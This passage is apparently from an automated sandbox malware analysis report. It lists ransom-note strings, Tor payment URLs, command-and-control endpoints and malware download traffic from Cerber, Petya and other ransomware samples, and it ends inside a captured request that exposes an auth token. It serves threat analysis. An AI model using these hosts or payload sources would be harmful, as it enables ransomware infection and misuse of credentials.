        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br></li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">VKPc3</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> in de adresbalk van uw browser;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> dans cette barre d
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> in diese Browser-Adressleiste;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> nella barra degli indirizzi di questo browser;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> do paska adresu przegl
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> nesta barra de endere
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> en la barra de direcciones de este navegador;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369553929.0000000005117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341996956.000000000511A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: how to decrypt your files. \n\n If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341996956.000000000511A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ExVersion4.0.0.1SOFTWARE\System32\Configuration\System32Windowscsrss.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystemcsrss.lnkClient Server Runtime Subsystemxpkxmodexstatexcntxwpxixsysshstsh1sh2shsntxfsMicrosoft\Windows\User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0127.0.0.1:--ignore-missing-torrc--SOCKSPort--DataDirectory--bridgeWatcher: Walker: http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.php?&v=b=i=k=ss=e=c=f=si=sh=shb=sha=cp=st=fl=nocache=can not create dircan not copy filecan not add to autoruncan not save value (mark)std exception: unknown c++ exceptioninvalid parameter exceptionSEH exceptionSEHSTD: C++0x
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *[@txhttp://petya37h5tbhyvki.onion/6zoerS
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/6zoerS
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/6zoerS31PksHipkSD3wnxFfPXFrCQLNKvSQZcDbeDNyeQFrqmAHjQ8Yk2cHrzL89WzNXpCU1rdbq53Kgh4s4PrErg2QZtL5377777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLL.DLL}
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLL.DLL}
        Source: DR012.47.drString found in binary or memory: *[@txhttp://petya37h5tbhyvki.onion/6zoerS
        Source: DR012.47.drString found in binary or memory: http://petya5koahtsf7sv.onion/6zoerS
        Source: DR012.47.drString found in binary or memory: http://petya5koahtsf7sv.onion/6zoerS31PksHipkSD3wnxFfPXFrCQLNKvSQZcDbeDNyeQFrqmAHjQ8Yk2cHrzL89WzNXpCU1rdbq53Kgh4s4PrErg2QZtL53
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488077680&AC=1&CPH=4ef661f2
        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: 